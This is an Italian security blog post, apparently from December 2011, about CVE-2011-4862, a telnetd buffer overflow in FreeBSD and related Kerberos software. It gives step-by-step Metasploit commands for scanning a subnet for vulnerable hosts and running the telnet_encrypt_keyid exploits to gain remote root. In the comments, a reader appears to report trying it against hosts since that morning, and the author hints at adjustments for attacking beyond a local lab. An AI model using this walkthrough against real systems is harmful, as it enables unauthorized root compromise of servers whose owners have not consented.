ClsHack:Computer Security Blog    

[CVE:2011-4862] Remote Root FreeBSD

Posted on: 29 December 2011

Questo è uno di quelli exploit che cambiano il mondo :)
Quasi tutti i server usano freeBSD o RHEL 3 e questo exploit permette un remote root semplice semplice con metasploit.

Descrizione CVE:2011-4862

Buffer overflow in libtelnet/encrypt.c in telnetd in FreeBSD 7.3 through 9.0, MIT Kerberos Version 5 Applications (aka krb5-appl) 1.0.2 and earlier, and Heimdal 1.5.1 and earlier allows remote attackers to execute arbitrary code via a long encryption key, as exploited in the wild in December 2011.
Publish Date : 2011-12-24 Last Update Date : 2011-12-27

Il modulo per metasploit per ora funziona con freeBSD<= 8.2 && freebsd >= 5.2 e RHEL 3 :)
Ho testato tutto perchè non ci credevo e l’immagine parla chiaro.

Vediamo come usarlo su metasploit:
Aggiorniamo:
msfupdate
Avviamo metasploit:
msfconsole
Carichiamo lo scanner:
use auxiliary/scanner/telnet/telnet_encrypt_overflow
set RHOSTS 192.168.0.0/24
set THREADS 64
run

Es:

Una volta capito se l’host è vulnerabile possiamo usare i due exploit:
Per RHEL 3:
use exploit/linux/telnet/telnet_encrypt_keyid
Per freeBSD:
use exploit/freebsd/telnet/telnet_encrypt_keyid
Una volta settato l’exploit settiamo RHOST:
set RHOST 192.168.0.130
Il payload, di ma è meglio usare quello di default :)
set PAYLOAD payload
e digitiamo:
exploit
Se tutto è andato a buon fine avremo un remote root facile facile :D
Versione freeBSD usata per la prova:

Related posts:

  1. [CVE-2011-3544]Metasploit: Java Remote untrusted Java Web Start
  2. [DOS]CVE-2011-3192: Apache HTTPD Killer Remote Denial of Service
  3. [METASPLOIT]Attack Linux and open remote Shell
  4. [Metasploit] multi/handler :D
  5. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction

This entry was posted on Thursday, December 29th, 2011 at 12:43 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • http://www.pawelzorzan.eu okno

    Non direi che questo exploit possa cambiare il mondo, qualunque sysadmin con un minimo di buon senso disabilita telnet da inetd subito dopo l’installazione.

    Ciau.

  • clshack_

    @okno:
    Cambiare il mondo è un po’ una frase ironica purtroppo il web è però pieno di gente che non guarda il lato sicurezza, una volta instalato il sistema lo li lascia senza fare aggiornamenti :P

  • MaX-xXx

    Io l’ho testato praticamente da questa mattina e non ho trovato ancora nulla

  • clshack_

    XD tutto testato in locale se hai testato fuori beh devi apportare dei piccoli accorgimenti :)